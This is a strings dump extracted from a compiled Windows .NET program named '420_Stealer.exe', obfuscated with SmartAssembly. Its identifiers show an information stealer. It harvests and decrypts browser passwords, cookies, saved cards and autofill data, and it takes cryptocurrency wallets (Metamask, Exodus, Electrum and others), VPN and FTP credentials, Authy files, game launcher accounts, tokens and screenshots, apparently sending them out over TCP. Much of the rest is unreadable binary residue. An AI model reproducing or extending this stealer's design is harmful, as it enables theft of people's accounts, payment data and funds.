!This program cannot be run in DOS mode.
`.rsrc
@.reloc
+1+6+;
-#+,|e
+Y+Z+_
+F+K+P
+R+W+\+]+a
+O+P~~
+G+L+Q+R~~
+I+N+S~~
+-+8ou
+?+Jou
+'+/+0t
+0+2~~
+6+;+@~
+4+9+>
KDBM(
+<+=+B+C
+g+l8q
+G+L~
+<+A~
+<+A+B+G
+!+"+'
,L&+L,
+F+G{+
-?`+T+X,
Y _c
Y _c
+4+9+:,
+@+E+M
+9+>+C-
+=+B+G
,!+#{:
,!+#{:
,!+#{:
,!+#{:
,:+C~T
+:+?+@+E-
+<+A+F+
,&+({\
,&+({\
,&+({\
+1+2~p
+++,(b
a+$+&~s
%,;*8e
bY {z}
%-)+d8e
+\+]+^+_+g8h
_b`}
+' _d}
_ _d}
,'+)+*+++,
_b`}
+Tz+[
+B+D+E
Y _bX
Y _cX
Y _bY
Y _bX
+@+A+F{
Y _bX
Y _bXT
Y _bY
+@+"+?+@{
hXhS+E
_+U+V{
+G+H+P
+7+8+9(}
+,+-+.{
_b`}
v4.0.30319
#Strings
KN6438FB
420_Stealer
<Module>
mscorlib
Object
System
ApplicationSettingsBase
System.Configuration
<>c__DisplayClass0_0
<>o__3
<>c__DisplayClass0_1
<>c__DisplayClass4_0
<>o__2
<>o__0
<>o__4
<>o__1
TSECItem
ValueType
NssInit
MulticastDelegate
Pk11SdrDecrypt
BCRYPT_PSS_PADDING_INFO
BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO
IDisposable
BCRYPT_KEY_LENGTHS_STRUCT
BCRYPT_OAEP_PADDING_INFO
CryptprotectPromptstruct
DataBlob
RecordHeaderField
TableEntry
SqliteMasterEntry
<>c__DisplayClass0_2
<>c__DisplayClass0_3
__StaticArrayInitTypeSize=10
MemberRefsProxy
SmartAssembly.HouseOfCards
Strings
GetString
SmartAssembly.Delegates
Attribute
DoNotObfuscateAttribute
SmartAssembly.Attributes
DoNotPruneAttribute
DoNotObfuscateTypeAttribute
DoNotPruneTypeAttribute
DoNotMoveAttribute
DynProx
SmartAssembly.StringsEncoding
DoNotEncodeStringsAttribute
SmartAssembly.Zip
CompressionAlgorithm
Inflater
StreamManipulator
OutputWindow
InflaterHuffmanTree
InflaterDynHeader
Deflater
DeflaterHuffman
DeflaterEngine
DeflaterPending
ZipStream
MemoryStream
System.IO
SimpleZip
__StaticArrayInitTypeSize=12
__StaticArrayInitTypeSize=16
__StaticArrayInitTypeSize=76
__StaticArrayInitTypeSize=116
__StaticArrayInitTypeSize=120
<PrivateImplementationDetails>
PoweredByAttribute
List`1
System.Collections.Generic
System.Windows.Forms
MessageBoxButtons
MessageBoxIcon
Random
<>9__2_0
ThreadStart
System.Threading
ResourceManager
System.Resources
CultureInfo
System.Globalization
<Nameq7>k__BackingField
<Profileq7>k__BackingField
AccountsCountq7
AutoFillsCountq7
CardsCountq7
CookiesCountq7
HistorysCountq7
Browserq7
Accountsq7
AutoFillsq7
Cardsq7
Cookiesq7
Historyq7
Downloadq7
<Urlq7>k__BackingField
Loginq7
Passwordq7
Fillq7
Valueq7
SavedNameq7
Numberq7
Nameq7
<Monthq7>k__BackingField
<Yearq7>k__BackingField
<Hostq7>k__BackingField
<Httpq7>k__BackingField
<Pathq7>k__BackingField
<Expiresq7>k__BackingField
<Valueq7>k__BackingField
FileNameq7
Titleq7
Dataq7
DataBrowsersq7
Existq7
ExistBitcoinq7
Bitcoinq7
ExistDashCoreq7
DashCoreq7
ExistLitecoinq7
Litecoinq7
ExistMoneroq7
Moneroq7
Dictionary`2
ExistElectrumq7
Electrumq7
ExistAtomicq7
Atomicq7
ExistArmoryq7
Armoryq7
ExistExodusq7
Exodusq7
ExistJaxxq7
Jaxxq7
ExistMetamaskq7
Metamaskq7
ExistBinanceq7
Binanceq7
ExistTronlinkq7
Tronlinkq7
ExistRoninwalletq7
Roninwalletq7
walletData
<>p__0
System.Core
CallSite`1
System.Runtime.CompilerServices
Action`4
CallSite
<>p__1
walletBrowserData
CS$<>8__locals1
SizeFilesq7
<Dirq7>k__BackingField
<Bytesq7>k__BackingField
<OSq7>k__BackingField
<ScreenSizeq7>k__BackingField
<ScreenByteq7>k__BackingField
<Dateq7>k__BackingField
<HWIDq7>k__BackingField
<RAMq7>k__BackingField
<CPUq7>k__BackingField
<GPUq7>k__BackingField
<Userq7>k__BackingField
SystemInfoq7
DateTime
mainObject
first2tokensq7
Infoq7
Tokensq7
FilesSessionq7
<FTPsq7>k__BackingField
<Portq7>k__BackingField
<Passwordq7>k__BackingField
Func`3
Func`4
<>p__2
<>p__3
<>p__4
<>p__5
<>p__6
<>p__7
<>p__8
<>p__9
IEnumerable
System.Collections
<>p__10
<>p__11
<>p__12
<>p__13
<>p__14
<>p__15
<>p__16
<>p__17
<>p__18
<>p__19
<LabyModq7>k__BackingField
<LunarClientq7>k__BackingField
<BadlionClientq7>k__BackingField
<OfficialExistq7>k__BackingField
<TLauncherExistq7>k__BackingField
<VimeWorldExistq7>k__BackingField
Versionsq7
ResoursePacksq7
Worldsq7
<Officialq7>k__BackingField
<TLauncherq7>k__BackingField
<VimeWorldq7>k__BackingField
<VimeOSUUIDq7>k__BackingField
<Nickq7>k__BackingField
<Emailq7>k__BackingField
<Typeq7>k__BackingField
<Launcherq7>k__BackingField
Keysq7
Action`3
MullvadExistq7
<MullvadTokenq7>k__BackingField
NordExistq7
<NordLoginq7>k__BackingField
<NordPassq7>k__BackingField
WindscribeExistq7
<WindscribeHashq7>k__BackingField
ProtonVPNExistq7
ProtonVPNFilesq7
OpenVPNExistq7
OpenVPNFilesq7
<IDq7>k__BackingField
<Loginq7>k__BackingField
Gamesq7
<ALoginq7>k__BackingField
<Usersq7>k__BackingField
RootFilesq7
Dirsq7
ObjectVPN
AuthyFilesq7
SECItemType
SECItemData
SECItemLen
pszAlgId
cbSalt
cbSize
dwInfoVersion
pbNonce
cbNonce
pbAuthData
cbAuthData
pbMacContext
cbMacContext
cbData
dwFlags
dwMinLength
dwMaxLength
dwIncrement
pbLabel
cbLabel
dwPromptFlags
hwndApp
szPrompt
pbData
Stopwatch
System.Diagnostics
Content
ItemName
RootNum
SqlStatement
<>9__5_0
Func`2
System.Management
ManagementObject
BrowserObject
Profile
browserObject
DBPass
DBFill
DBCookie
DBHistory
browserObjects
BrowserDir
BrowserName
ProfileName
CS$<>8__locals2
DBCard
CS$<>8__locals3
ModuleHandle
MustUseCache
OffsetValue
hashtable
hashtableLock
cacheStrings
offset
value__
RawZip
RawZipAndDes
RawZipAndAes
ExceptionMessage
CPLENS
CPLEXT
CPDIST
CPDEXT
DECODE_HEADER
DECODE_DICT
DECODE_BLOCKS
DECODE_STORED_LEN1
DECODE_STORED_LEN2
DECODE_STORED
DECODE_DYN_HEADER
DECODE_HUFFMAN
DECODE_HUFFMAN_LENBITS
DECODE_HUFFMAN_DIST
DECODE_HUFFMAN_DISTBITS
DECODE_CHKSUM
FINISHED
neededBits
repLength
repDist
uncomprLen
isLastBlock
outputWindow
dynHeader
litlenTree
distTree
window
window_start
window_end
buffer
bits_in_buffer
WINDOW_SIZE
WINDOW_MASK
windowEnd
windowFilled
MAX_BITLEN
defLitLenTree
defDistTree
BLLENS
repMin
repBits
blLens
litdistLens
blTree
repSymbol
lastLen
BL_ORDER
IS_FLUSHING
IS_FINISHING
BUSY_STATE
FLUSHING_STATE
FINISHING_STATE
FINISHED_STATE
totalOut
pending
engine
BUFSIZE
LITERAL_NUM
DIST_NUM
BITLEN_NUM
REP_3_6
REP_3_10
REP_11_138
EOF_SYMBOL
bit4Reverse
literalTree
last_lit
extra_bits
staticLCodes
staticLLength
staticDCodes
staticDLength
length
minNumCodes
numCodes
bl_counts
maxLength
MAX_MATCH
MIN_MATCH
HASH_SIZE
HASH_MASK
HASH_SHIFT
MIN_LOOKAHEAD
MAX_DIST
TOO_FAR
matchStart
matchLen
prevAvailable
blockStart
strstart
lookahead
inputBuf
totalIn
inputOff
inputEnd
huffman
bitCount
292AFDE3B64E6636D68F1120D9242F1F85E38EF7BF306E4407C2303EB63791EF
52AA14DBFAD385CC0A67E081C133BE3C353A46E2260E564186F0FEF33B8874E5
53A37728D880062575E9F0AB8C6AB51BF69DD582F88E5F95E3BABB7C73A6729B
A7BECD43C1DE3B2E78F02487AF261536EF05E65091673703AE6BC720345CCF2D
B23D510F520CB4BA8AFA847F8A40E757C40CB6A55B237EFA1AC6D3984911B114
C133E473E5E653C5C4AEDB8BCC1C1A3A44D384FC0B6C0FCF04672B1B325EC01B
CC8CD41CEF907C4D216069122C4B89936211361F9050A717A1E37AD1862E952F
F35C6498936D148797AFC611942CDB3E7A76FDFCD170DBACCF908832DD8B46A8
F8D7861760C88CC514F66095AF0AED47ECBA063ADB65F47125ED07BCC2CF9842
FC216F5C5AE2947D800794ECD5F752EE8381073C2E5D0D095FDA040F541702F3
.cctor
SetProcessDPIAware
user32.dll
<Main>b__2_0
<Starter>b__0
<Starter>b__1
<Starter>b__2
Browser
<Starter>b__3
fileSizeBytes
plainText
<Grab>b__0
<Grab>b__1
<Grab>b__2
<Grab>b__3
<Grab>b__4
<Grab>b__5
<Grab>b__6
<Grab>b__7
<Grab>b__8
<Grab>b__9
<Grab>b__10
<Grab>b__11
<GetFTP>b__0
LabyMod
Badlion
Official
TLauncher
VimeWorld
authyObject
sFileName
LoadLibrary
kernel32.dll
hModule
sProcName
GetProcAddress
object
method
Invoke
sDirectory
BeginInvoke
IAsyncResult
AsyncCallback
callback
EndInvoke
result
tsData
tsResult
phAlgorithm
pszImplementation
BCryptOpenAlgorithmProvider
bcrypt.dll
hAlgorithm
BCryptCloseAlgorithmProvider
hObject
pszProperty
pbOutput
cbOutput
pcbResult
BCryptGetProperty
pbInput
cbInput
BCryptSetProperty
hImportKey
pszBlobType
pbKeyObject
cbKeyObject
BCryptImportKey
BCryptDestroyKey
pPaddingInfo
BCryptEncrypt
BCryptDecrypt
pCipherText
pszDescription
pEntropy
pReserved
pPrompt
pPlainText
CryptUnprotectData
crypt32.dll
cipherText
authTag
provider
chainingMode
arrays
bCipher
bEntropy
bEncryptedData
sMasterKey
Dispose
message
Exception
filePath
Created
Number
fileName
rowNum
tableName
startIndex
startIdx
endIdx
<GetModelsAndManufactures>b__5_0
lpModuleName
GetModuleHandle
<Starter>b__4
<Starter>b__5
<Starter>b__6
CreateMemberRefsDelegates
typeID
CreateGetStringDelegate
ownerType
stringID
GetCachedOrResource
GetFromResource
CacheString
GetAesTransform
ICryptoTransform
System.Security.Cryptography
decrypt
GetCompressionAlgorithm
ZipAndAes
algorithm
DecodeHuffman
Decode
Inflate
PeekBits
DropBits
get_AvailableBits
get_AvailableBytes
SkipToByteBoundary
get_IsNeedingInput
CopyBytes
output
SetInput
SlowRepeat
repStart
Repeat
CopyStored
CopyDict
GetFreeSpace
GetAvailable
CopyOutput
codeLengths
BuildTree
GetSymbol
BuildLitLenTree
BuildDistTree
get_TotalOut
Finish
get_IsFinished
Deflate
BitReverse
toReverse
distance
SendAllTrees
blTreeCodes
CompressBlock
FlushStoredBlock
stored
storedOffset
storedLength
lastBlock
FlushBlock
IsFull
TallyLit
TallyDist
minCodes
WriteSymbol
SetStaticCodes
stCodes
stLength
BuildCodes
BuildLength
childs
GetEncodedLength
CalcBLFreq
WriteTree
UpdateHash
InsertString
SlideWindow
FillWindow
FindLongestMatch
curMatch
DeflateSlow
finish
NeedsInput
WriteShort
WriteBlock
get_BitCount
AlignToByte
WriteBits
get_IsFlushed
WriteInt
ReadShort
ReadInt
Profileq7
Monthq7
Yearq7
Hostq7
Httpq7
Pathq7
Expiresq7
Bytesq7
ScreenSizeq7
ScreenByteq7
Dateq7
HWIDq7
Userq7
FTPsq7
Portq7
LabyModq7
LunarClientq7
BadlionClientq7
OfficialExistq7
TLauncherExistq7
VimeWorldExistq7
Officialq7
TLauncherq7
VimeWorldq7
VimeOSUUIDq7
Nickq7
Emailq7
Typeq7
Launcherq7
MullvadTokenq7
NordLoginq7
NordPassq7
WindscribeHashq7
ALoginq7
Usersq7
AvailableBits
AvailableBytes
IsNeedingInput
TotalOut
IsFinished
BitCount
IsFlushed
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
DebuggableAttribute
DebuggingModes
AssemblyTitleAttribute
System.Reflection
AssemblyDescriptionAttribute
AssemblyConfigurationAttribute
AssemblyCompanyAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
ComVisibleAttribute
System.Runtime.InteropServices
GuidAttribute
AssemblyFileVersionAttribute
TargetFrameworkAttribute
System.Runtime.Versioning
CompilerGeneratedAttribute
GeneratedCodeAttribute
System.CodeDom.Compiler
DebuggerNonUserCodeAttribute
UnmanagedFunctionPointerAttribute
CallingConvention
AttributeUsageAttribute
AttributeTargets
DebuggerBrowsableAttribute
DebuggerBrowsableState
DynamicAttribute
ObsoleteAttribute
ParamArrayAttribute
EditorBrowsableAttribute
System.ComponentModel
EditorBrowsableState
_420_Stealer.Properties.Resources.resources
{0dc96a27-6020-4c38-8f73-7be927a50205}
GetTypeFromHandle
RuntimeTypeHandle
Process
GetCurrentProcess
get_ProcessName
String
Concat
Thread
op_Inequality
MessageBox
DialogResult
get_Assembly
Assembly
SettingsBase
Synchronized
GetEnumerator
Enumerator
get_Current
MoveNext
Directory
GetFiles
GetFileName
ReadAllBytes
Exists
op_Equality
ContainsKey
Microsoft.CSharp
CSharpArgumentInfo
Microsoft.CSharp.RuntimeBinder
Create
CSharpArgumentInfoFlags
Binder
InvokeMember
CallSiteBinder
CSharpBinderFlags
IEnumerable`1
Target
get_Item
GetDirectories
DirectoryInfo
FileSystemInfo
get_Name
EndsWith
Contains
Registry
Microsoft.Win32
CurrentUser
RegistryKey
GetValue
ToString
OpenSubKey
Replace
GetDirectoryName
KeyCollection
get_Keys
Delete
get_Count
FileInfo
get_Length
Format
GetExtension
get_UtcNow
System.Drawing
get_Size
Graphics
CopyFromScreen
ImageFormat
System.Drawing.Imaging
get_Jpeg
Stream
ToArray
Screen
GetBounds
Rectangle
get_Width
get_Height
Bitmap
FromImage
LocalMachine
ToUpper
ManagementObjectCollection
ManagementObjectEnumerator
ManagementBaseObject
ManagementObjectSearcher
Convert
ToDouble
Substring
TrimStart
TrimEnd
Environment
get_Is64BitOperatingSystem
get_UserName
Encoding
System.Text
get_UTF8
GetBytes
ToBase64String
TimeSpan
get_Hours
get_Minutes
get_Seconds
get_Milliseconds
System.Web.Extensions
JavaScriptSerializer
System.Web.Script.Serialization
set_MaxJsonLength
Serialize
TcpClient
System.Net.Sockets
set_SendTimeout
set_ReceiveTimeout
get_Client
Socket
SocketFlags
get_Elapsed
AddRange
ReadAllText
System.Text.RegularExpressions
Matches
MatchCollection
IEnumerator
Capture
get_Value
System.Xml
XmlElement
GetElementsByTagName
XmlNodeList
get_ItemOf
XmlNode
get_InnerText
FromBase64String
IsNullOrEmpty
Predicate`1
XmlDocument
GetFileNameWithoutExtension
Deserialize
GetMember
GetIndex
ReadAllLines
get_Chars
TryParse
StartsWith
SearchOption
get_FullName
Combine
SelectSingleNode
System.Security
ProtectedData
Unprotect
DataProtectionScope
Marshal
AllocHGlobal
UInt32
CryptographicException
FreeHGlobal
BitConverter
ToInt32
IntPtr
get_Unicode
Buffer
BlockCopy
SizeOf
get_Default
Console
WriteLine
get_CurrentThread
get_ManagedThreadId
GetHashCode
get_Groups
GroupCollection
FileNotFoundException
GetFolderPath
SpecialFolder
GetEnvironmentVariable
GetTempPath
get_CurrentDirectory
RuntimeHelpers
InitializeArray
RuntimeFieldHandle
Resize
get_BigEndianUnicode
IndexOf
StringComparison
ToLower
Compare
ToInt64
GetProcessesByName
SystemInformation
get_TerminalServerSession
Enumerable
System.Linq
FirstOrDefault
OfType
GetDelegateForFunctionPointer
Delegate
NullReferenceException
get_Now
AddMonths
get_Ticks
ResolveTypeHandle
MemberInfo
ResolveMethodHandle
RuntimeMethodHandle
MethodBase
GetMethodFromHandle
MethodInfo
get_IsStatic
FieldInfo
get_FieldType
CreateDelegate
GetParameters
ParameterInfo
get_ParameterType
get_ReturnType
DynamicMethod
System.Reflection.Emit
GetILGenerator
ILGenerator
OpCodes
Ldarg_0
OpCode
Ldarg_1
Ldarg_2
Ldarg_3
Ldarg_S
Tailcall
Callvirt
SetValue
GetFields
BindingFlags
GetExecutingAssembly
GetModules
Module
get_ModuleHandle
get_Module
GetMethods
Ldc_I4
get_MetadataToken
TryGetValue
Monitor
Intern
GetManifestResourceStream
SymmetricAlgorithm
CreateDecryptor
CreateEncryptor
AesCryptoServiceProvider
TransformFinalBlock
ArgumentOutOfRangeException
FormatException
get_Position
set_Position
get_Message
InvalidOperationException
WriteByte
ReadByte
WrapNonExceptionThrows
Loader
Copyright
2021
$7c83c171-235c-499c-8a17-bd1662e9b6c4
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4(
#Powered by SmartAssembly 8.0.3.4821
3System.Resources.Tools.StronglyTypedResourceBuilder
4.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
11.0.0.0
Use `RawZip`.
Use `RawZipAndAes`.
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
{Z3~b.u:1t[
&%SK x+x
t]-G".
mvpw$
p2p7WU
n"!bQx
F}+z)2
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
- 1#2-718598<9X:
! $#*)/.54A@B@DCGFHFIFKJLJMJNJOJPJUTVTWTYX\[^]_]dcgfihjhkhlhrq}|
{0dc96a27-6020-4c38-8f73-7be927a50205}
version
Selected compression algorithm is not supported.
Unknown Header
algorithm
ERR 2003:
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Loader
FileVersion
1.0.0.0
InternalName
420_Stealer.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
420_Stealer.exe
ProductName
Loader
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0